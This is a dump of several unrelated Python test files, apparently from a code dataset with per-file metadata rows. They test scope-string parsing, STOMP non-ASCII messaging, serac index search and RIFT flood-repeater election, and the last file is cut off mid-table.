ok, res = convert_scope_string_to_expression(param)
expect(ok).to(be_false)
expect(res).to(start_with(f"invalid scope: {param}"))
with it("returns error when parsing incorrect: agent.id"):
param = "agent.id"
ok, res = convert_scope_string_to_expression(param)
expect(ok).to(be_false)
expect(res).to(start_with(f"invalid scope: {param}"))
with it("returns error when parsing incorrect: agent.id is"):
param = "agent.id is"
ok, res = convert_scope_string_to_expression(param)
expect(ok).to(be_false)
expect(res).to(start_with(f"invalid scope: {param}"))
| 35.581081
| 88
| 0.529687
| 854
| 7,899
| 4.776347
| 0.077283
| 0.094386
| 0.101495
| 0.112773
| 0.917137
| 0.855602
| 0.816377
| 0.799215
| 0.781564
| 0.749448
| 0
| 0
| 0.311052
| 7,899
| 221
| 89
| 35.742081
| 0.749541
| 0
| 0
| 0.70202
| 0
| 0.005051
| 0.328523
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.015152
| 0
| 0.015152
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e088f49a25618f7f1f2298e59117b912a8da6848
| 5,360
|
py
|
Python
|
tests/test_nonascii.py
|
andy-maier/stomp.py
|
021ca958b9c7ce4d87215f97a4120259743cee2b
|
[
"Apache-2.0"
] | 408
|
2015-01-06T06:09:45.000Z
|
2022-03-09T08:14:59.000Z
|
tests/test_nonascii.py
|
andy-maier/stomp.py
|
021ca958b9c7ce4d87215f97a4120259743cee2b
|
[
"Apache-2.0"
] | 231
|
2015-01-13T08:23:34.000Z
|
2022-03-29T02:29:34.000Z
|
tests/test_nonascii.py
|
andy-maier/stomp.py
|
021ca958b9c7ce4d87215f97a4120259743cee2b
|
[
"Apache-2.0"
] | 171
|
2015-02-05T23:40:35.000Z
|
2022-01-25T14:17:18.000Z
|
# -*- coding: UTF-8 -*-
import filecmp
import stomp
from stomp.listener import *
from .testutils import *
@pytest.fixture
def conn():
conn = stomp.Connection(get_default_host(), auto_decode=False)
listener = TestListener("123", print_to_log=True)
conn.set_listener("testlistener", listener)
conn.connect(get_default_user(), get_default_password(), wait=True)
yield conn
conn.disconnect(receipt=None)
@pytest.fixture
def conn_encode():
conn = stomp.Connection(get_default_host(), auto_decode=True)
listener = TestListener("123", print_to_log=True)
conn.set_listener("testlistener", listener)
conn.connect(get_default_user(), get_default_password(), wait=True)
yield conn
conn.disconnect(receipt=None)
@pytest.fixture
def conn_encode_utf18():
conn = stomp.Connection(get_default_host(), auto_decode=True, encoding="utf-16")
listener = TestListener("123", print_to_log=True)
conn.set_listener("testlistener", listener)
conn.connect(get_default_user(), get_default_password(), wait=True)
yield conn
conn.disconnect(receipt=None)
class TestNonAsciiSend(object):
def test_send_nonascii(self, conn):
listener = conn.get_listener("testlistener")
queuename = "/queue/nonasciitest-%s" % listener.timestamp
conn.subscribe(destination=queuename, ack="auto", id="1")
txt = test_text_for_utf8
conn.send(body=txt, destination=queuename, receipt="123")
listener.wait_for_message()
assert listener.connections >= 1, "should have received 1 connection acknowledgement"
assert listener.messages >= 1, "should have received 1 message"
assert listener.errors == 0, "should not have received any errors"
(_, msg) = listener.get_latest_message()
assert encode(txt) == msg
def test_image_send(self, conn):
d = os.path.dirname(os.path.realpath(__file__))
srcname = os.path.join(d, "test.gif")
with open(srcname, 'rb') as f:
img = f.read()
listener = conn.get_listener("testlistener")
queuename = "/queue/nonascii-image-%s" % listener.timestamp
conn.subscribe(destination=queuename, ack="auto", id="1")
conn.send(body=img, destination=queuename, receipt="123")
listener.wait_for_message()
assert listener.connections >= 1, "should have received 1 connection acknowledgement"
assert listener.messages >= 1, "should have received 1 message"
assert listener.errors == 0, "should not have received any errors"
(_, msg) = listener.get_latest_message()
assert img == msg
destname = os.path.join(d, "test-out.gif")
with open(destname, 'wb') as f:
f.write(img)
assert filecmp.cmp(srcname, destname)
def test_image_send(self, conn):
d = os.path.dirname(os.path.realpath(__file__))
srcname = os.path.join(d, "test.gif.gz")
with open(srcname, 'rb') as f:
img = f.read()
listener = conn.get_listener("testlistener")
queuename = "/queue/nonascii-image-%s" % listener.timestamp
conn.subscribe(destination=queuename, ack="auto", id="1")
conn.send(body=img, destination=queuename, receipt="123")
listener.wait_for_message()
assert listener.connections >= 1, "should have received 1 connection acknowledgement"
assert listener.messages >= 1, "should have received 1 message"
assert listener.errors == 0, "should not have received any errors"
(_, msg) = listener.get_latest_message()
assert img == msg
destname = os.path.join(d, "test-out.gif.gz")
with open(destname, 'wb') as f:
f.write(img)
assert filecmp.cmp(srcname, destname)
class TestNonAsciiSendAutoDecode(object):
def test_send_nonascii_auto_decoding(self, conn_encode):
listener = conn_encode.get_listener("testlistener")
queuename = "/queue/nonasciitest2-%s" % listener.timestamp
conn_encode.subscribe(destination=queuename, ack="auto", id="1")
txt = test_text_for_utf8
conn_encode.send(body=txt, destination=queuename, receipt="123")
listener.wait_for_message()
assert listener.connections >= 1, "should have received 1 connection acknowledgement"
assert listener.messages >= 1, "should have received 1 message"
assert listener.errors == 0, "should not have received any errors"
(_, msg) = listener.get_latest_message()
assert txt == msg
class TestNonAsciiSendSpecificEncoding(object):
def test_send_nonascii_auto_encoding(self, conn_encode_utf18):
listener = conn_encode_utf18.get_listener("testlistener")
queuename = "/queue/nonasciitest2-%s" % listener.timestamp
conn_encode_utf18.subscribe(destination=queuename, ack="auto", id="1")
txt = test_text_for_utf16
conn_encode_utf18.send(body=txt, destination=queuename, receipt="123")
listener.wait_for_message()
assert listener.connections >= 1, "should have received 1 connection acknowledgement"
assert listener.messages >= 1, "should have received 1 message"
assert listener.errors == 0, "should not have received any errors"
(_, msg) = listener.get_latest_message()
assert txt == msg
| 35.496689
| 93
| 0.675746
| 650
| 5,360
| 5.409231
| 0.158462
| 0.055461
| 0.059727
| 0.054039
| 0.896189
| 0.889079
| 0.872582
| 0.858646
| 0.846416
| 0.819681
| 0
| 0.017237
| 0.209888
| 5,360
| 150
| 94
| 35.733333
| 0.812987
| 0.003918
| 0
| 0.714286
| 0
| 0
| 0.166948
| 0.021735
| 0
| 0
| 0
| 0
| 0.209524
| 1
| 0.07619
| false
| 0.028571
| 0.038095
| 0
| 0.142857
| 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e08c5286333b39452e3ae32365e85e30e0876ee8
| 3,752
|
py
|
Python
|
tests/index/test_index__search.py
|
radiac/serac
|
61ac873aa53784a554fc44a799732f5d325a3f94
|
[
"BSD-3-Clause"
] | null | null | null |
tests/index/test_index__search.py
|
radiac/serac
|
61ac873aa53784a554fc44a799732f5d325a3f94
|
[
"BSD-3-Clause"
] | null | null | null |
tests/index/test_index__search.py
|
radiac/serac
|
61ac873aa53784a554fc44a799732f5d325a3f94
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Test search() in serac/index/index.py
"""
from pathlib import Path
from time import time
from serac.index.index import Pattern, search
from .test_index import IndexTestBase
class TestIndexSearch(IndexTestBase):
def test_search_file__from_head__finds_single_file(self, fs, freezer):
initial_time, update_time = self.mock_two_states(fs, freezer)
results = search(timestamp=int(time()), pattern=Pattern("/src/dir/three.txt"))
assert len(results) == 1
assert Path("/src/dir/three.txt") in results
assert results[Path("/src/dir/three.txt")].last_modified == int(
update_time.timestamp()
)
def test_search_file__from_past__finds_single_file(self, fs, freezer):
initial_time, update_time = self.mock_two_states(fs, freezer)
results = search(
timestamp=int(initial_time.timestamp()),
pattern=Pattern("/src/dir/three.txt"),
)
assert len(results) == 1
assert Path("/src/dir/three.txt") in results
assert results[Path("/src/dir/three.txt")].last_modified == int(
initial_time.timestamp()
)
def test_search_dir__from_head__finds_some_files(self, fs, freezer):
initial_time, update_time = self.mock_two_states(fs, freezer)
results = search(timestamp=int(time()), pattern=Pattern("/src/dir"))
assert len(results) == 3
assert Path("/src/dir/three.txt") in results
assert (
results[Path("/src/dir/three.txt")].last_modified == update_time.timestamp()
)
assert Path("/src/dir/four.txt") in results
assert Path("/src/dir/subdir/five.txt") in results
def test_search_dir__from_past__finds_some_files(self, fs, freezer):
initial_time, update_time = self.mock_two_states(fs, freezer)
results = search(
timestamp=int(initial_time.timestamp()), pattern=Pattern("/src/dir")
)
assert len(results) == 3
assert Path("/src/dir/three.txt") in results
assert (
results[Path("/src/dir/three.txt")].last_modified
== initial_time.timestamp()
)
assert Path("/src/dir/four.txt") in results
assert Path("/src/dir/subdir/five.txt") in results
def test_search_all__from_head__finds_all_files(self, fs, freezer):
initial_time, update_time = self.mock_two_states(fs, freezer)
results = search(timestamp=int(time()))
assert len(results) == 5
assert Path("/src/one.txt") in results
assert Path("/src/two.txt") in results
assert Path("/src/dir/three.txt") in results
assert (
results[Path("/src/dir/three.txt")].last_modified == update_time.timestamp()
)
assert Path("/src/dir/four.txt") in results
assert Path("/src/dir/subdir/five.txt") in results
def test_search_all__from_past__finds_all_files(self, fs, freezer):
initial_time, update_time = self.mock_two_states(fs, freezer)
results = search(timestamp=int(initial_time.timestamp()))
assert len(results) == 5
assert Path("/src/one.txt") in results
assert Path("/src/two.txt") in results
assert Path("/src/dir/three.txt") in results
assert (
results[Path("/src/dir/three.txt")].last_modified
== initial_time.timestamp()
)
assert Path("/src/dir/four.txt") in results
assert Path("/src/dir/subdir/five.txt") in results
def test_search_missing__returns_zero(self, fs, freezer):
initial_time, update_time = self.mock_two_states(fs, freezer)
results = search(timestamp=int(time()), pattern=Pattern("/does/not.exist"))
assert len(results) == 0
| 39.083333
| 88
| 0.644456
| 493
| 3,752
| 4.69574
| 0.115619
| 0.062203
| 0.086393
| 0.084665
| 0.889849
| 0.848812
| 0.848812
| 0.848812
| 0.848812
| 0.848812
| 0
| 0.002415
| 0.227612
| 3,752
| 95
| 89
| 39.494737
| 0.796411
| 0.009861
| 0
| 0.592105
| 0
| 0
| 0.133531
| 0.025897
| 0
| 0
| 0
| 0
| 0.407895
| 1
| 0.092105
| false
| 0
| 0.052632
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0e1fc83f5c66e904377380b1e887b58301e296d
| 84,949
|
py
|
Python
|
tests/test_node_flood_repeater_election.py
|
pthubert/rift-python
|
41b596530be91ca8545f5022fead1d6d2021d319
|
[
"Apache-2.0"
] | null | null | null |
tests/test_node_flood_repeater_election.py
|
pthubert/rift-python
|
41b596530be91ca8545f5022fead1d6d2021d319
|
[
"Apache-2.0"
] | null | null | null |
tests/test_node_flood_repeater_election.py
|
pthubert/rift-python
|
41b596530be91ca8545f5022fead1d6d2021d319
|
[
"Apache-2.0"
] | null | null | null |
import logging
import re
import constants
import encoding.ttypes
import engine
import interface
import neighbor
import node
import packet_common
# pylint:disable=too-many-locals
# pylint:disable=invalid-name
# pylint:disable=line-too-long
# pylint:disable=too-many-lines
NODE_SYSID = 1
NODE_LEVEL = 0
PARENT_LEVEL = 1
GRANDPARENT_LEVEL = 2
SOUTH = constants.DIR_SOUTH
NORTH = constants.DIR_NORTH
EW = constants.DIR_EAST_WEST
def make_test_node(parents, additional_node_config=None):
test_engine = engine.Engine(
passive_nodes=[],
run_which_nodes=[],
interactive=False,
telnet_port_file=None,
ipv4_multicast_loopback=False,
ipv6_multicast_loopback=False,
log_level=logging.CRITICAL,
config={}
)
test_engine.floodred_system_random = 11111111111111111111 # Make unit test deterministic
node_config = {
"name": "node" + str(NODE_SYSID),
"systemid": NODE_SYSID,
"level": NODE_LEVEL,
"skip-self-orginated-ties": True # The test is in control of what TIEs are in the DB
}
if additional_node_config:
node_config.update(additional_node_config)
test_node = node.Node(node_config, test_engine)
# Create fake interfaces for parents (in state 3-way)
for parent_sysid in parents.keys():
make_parent_interface(test_node, parent_sysid)
# Fill TIE-DB for the first time
update_test_node(test_node, parents)
return test_node
def update_test_node(test_node, parents):
grandparents = compute_grandparents_connectivity(parents)
# Empty the TIE-DB (we are going to re-build it from scratch)
test_node.tie_metas.clear()
# Add self-originated Node-TIE for node to TIE-DB
neighbors = []
for parent_sysid, _grandparent_sysids in parents.items():
neighbor_info = (PARENT_LEVEL, parent_sysid)
neighbors.append(neighbor_info)
node_tie_packet = make_node_tie_packet(NODE_SYSID, NODE_LEVEL, neighbors)
test_node.store_tie_packet(node_tie_packet)
# Add Node-TIEs for parents to TIE-DB
for parent_sysid, grandparent_sysids in parents.items():
neighbors = []
neighbor_info = (NODE_LEVEL, NODE_SYSID)
neighbors.append(neighbor_info)
for grandparent_sysid in grandparent_sysids:
neighbor_info = (GRANDPARENT_LEVEL, grandparent_sysid)
neighbors.append(neighbor_info)
node_tie_packet = make_node_tie_packet(parent_sysid, PARENT_LEVEL, neighbors)
test_node.store_tie_packet(node_tie_packet)
# Add Node-TIEs for grandparents to TIE-DB
for grandparent_sysid, parent_sysids in grandparents.items():
neighbors = []
for parent_sysid in parent_sysids:
neighbor_info = (PARENT_LEVEL, parent_sysid)
neighbors.append(neighbor_info)
node_tie_packet = make_node_tie_packet(grandparent_sysid, GRANDPARENT_LEVEL, neighbors)
test_node.store_tie_packet(node_tie_packet)
def make_node_tie_packet(sysid, level, neighbors):
node_tie = packet_common.make_node_tie_packet(
name="node" + str(sysid),
level=level,
direction=SOUTH,
originator=sysid,
tie_nr=1,
seq_nr=1,
lifetime=100)
for neighbor_info in neighbors:
neighbor_level, neighbor_sysid = neighbor_info
local_link_id = neighbor_sysid
remote_link_id = sysid
link_id_pair = encoding.ttypes.LinkIDPair(local_link_id, remote_link_id)
link_ids = set([link_id_pair])
neighbor_tie_element = encoding.ttypes.NodeNeighborsTIEElement(
level=neighbor_level,
cost=1,
link_ids=link_ids,
bandwidth=100)
node_tie.element.node.neighbors[neighbor_sysid] = neighbor_tie_element
return node_tie
def make_parent_interface(test_node, parent_sysid):
intf_name = "intf" + str(parent_sysid)
intf_config = {
"name": intf_name
}
intf = test_node.create_interface(intf_config)
lie_neighbor = encoding.ttypes.Neighbor(parent_sysid, 0)
lie_packet = encoding.ttypes.LIEPacket(
name="intf" + str(test_node.system_id),
local_id=0,
flood_port=0,
link_mtu_size=1500,
neighbor=lie_neighbor,
pod=0,
nonce=0,
node_capabilities=None,
holdtime=3,
not_a_ztp_offer=False,
you_are_flood_repeater=False,
label=None)
packet_content = encoding.ttypes.PacketContent(lie=lie_packet)
packet_header = encoding.ttypes.PacketHeader(
sender=parent_sysid,
level=PARENT_LEVEL)
lie_protocol_packet = encoding.ttypes.ProtocolPacket(packet_header, packet_content)
# pylint:disable=protected-access
intf.fsm._state = interface.Interface.State.THREE_WAY
intf.neighbor = neighbor.Neighbor(
lie_protocol_packet=lie_protocol_packet,
neighbor_address="1.1.1.1",
neighbor_port=1)
def check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs,
additional_node_config=None):
test_node = make_test_node(parents, additional_node_config)
test_node.floodred_elect_repeaters()
if expected_parents:
assert test_node.floodred_parents_table().to_string() == expected_parents
if expected_grandparents:
assert test_node.floodred_grandparents_table().to_string() == expected_grandparents
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
return test_node
def compute_grandparents_connectivity(parents):
grandparents = {}
for parent_sysid, grandparent_sysids in parents.items():
for grandparent_sysid in grandparent_sysids:
if grandparent_sysid not in grandparents:
grandparents[grandparent_sysid] = []
if parent_sysid not in grandparents[grandparent_sysid]:
grandparents[grandparent_sysid].append(parent_sysid)
return grandparents
def test_3x3_full():
# 3 parents (11, 12, 13)
# 3 grandparents (21, 22, 23)
# Full connectivity between parents and grandparents
packet_common.add_missing_methods_to_thrift()
parents = {
11: [21, 22, 23],
12: [21, 22, 23],
13: [21, 22, 23]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 3 | 1: 3-3 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 3 | 1: 3-3 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 3 | 1: 3-3 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs)
def test_8x8_full():
# 8 parents (11, ..., 18)
# 8 grandparents (21, ..., 28)
# Full connectivity between parents and grandparents
packet_common.add_missing_methods_to_thrift()
parents = {
11: [21, 22, 23, 24, 25, 26, 27, 28],
12: [21, 22, 23, 24, 25, 26, 27, 28],
13: [21, 22, 23, 24, 25, 26, 27, 28],
14: [21, 22, 23, 24, 25, 26, 27, 28],
15: [21, 22, 23, 24, 25, 26, 27, 28],
16: [21, 22, 23, 24, 25, 26, 27, 28],
17: [21, 22, 23, 24, 25, 26, 27, 28],
18: [21, 22, 23, 24, 25, 26, 27, 28]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 8 | 1: 8-8 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 8 | 1: 8-8 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 8 | 1: 8-8 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 8 | 1: 8-8 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 8 | 1: 8-8 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 8 | 1: 8-8 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 8 | 1: 8-8 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 8 | 1: 8-8 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 8 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs)
def test_1x1():
# 1 parents (11)
# 1 grandparents (21)
# Full connectivity between parents and grandparents (of course)
# In this test case, the parent only has 1 grandparent, so it is not possible to meet the
# desired reduncancy of 2 separate paths to each grandparent
packet_common.add_missing_methods_to_thrift()
parents = {
11: [21]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 1 | 1: 1-1 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs)
def test_8x8_partial_connectivity_fully_redundant_coverage():
# 8 parents (11, ..., 18)
# 8 grandparents (21, ..., 28)
# Partial connectivity between parents and grandparents:
# Full redundant coverage of all grandparents is possible
# Default shuffle similarity of 2
packet_common.add_missing_methods_to_thrift()
parents = {
# pylint:disable=bad-whitespace
11: [21, 22, 24, 25, 26 ],
12: [ 24, 25, 26, 27, 28],
13: [21, 22, 24, 26, 27, 28],
14: [21, 22, 23, 24, 25, 26, 27, 28],
15: [ 22, 24, 26, 28],
16: [21, 28],
17: [21, 22, 23, 25, 26, 27, 28],
18: [21, 22, 23, 24, 25, 27, 28]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 7 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 6 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 8 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 7 | 1: 8-6 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 5 | 2: 5-4 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 4 | 2: 5-4 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 5 | 2: 5-4 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 2 | 3: 2-2 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 6 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 6 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 6 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 5 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 6 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 5 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 7 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs)
def test_8x8_partial_connectivity_partial_redundant_coverage():
# 8 parents (11, ..., 18)
# 8 grandparents (21, ..., 28)
# Partial connectivity between parents and grandparents:
# Some grandparents are fully covered, others not
# Default shuffle similarity of 2
packet_common.add_missing_methods_to_thrift()
parents = {
# pylint:disable=bad-whitespace
11: [21, 23, 26, 28],
12: [ 22, 24, 27 ],
13: [21 ],
14: [ 22, ],
15: [ 24, 27 ],
16: [ 23, 26, 27 ],
17: [ 22, 24, 26 ],
18: [21, 24, 25, 27 ]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 4 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 3 | 1: 4-2 | True |\n"
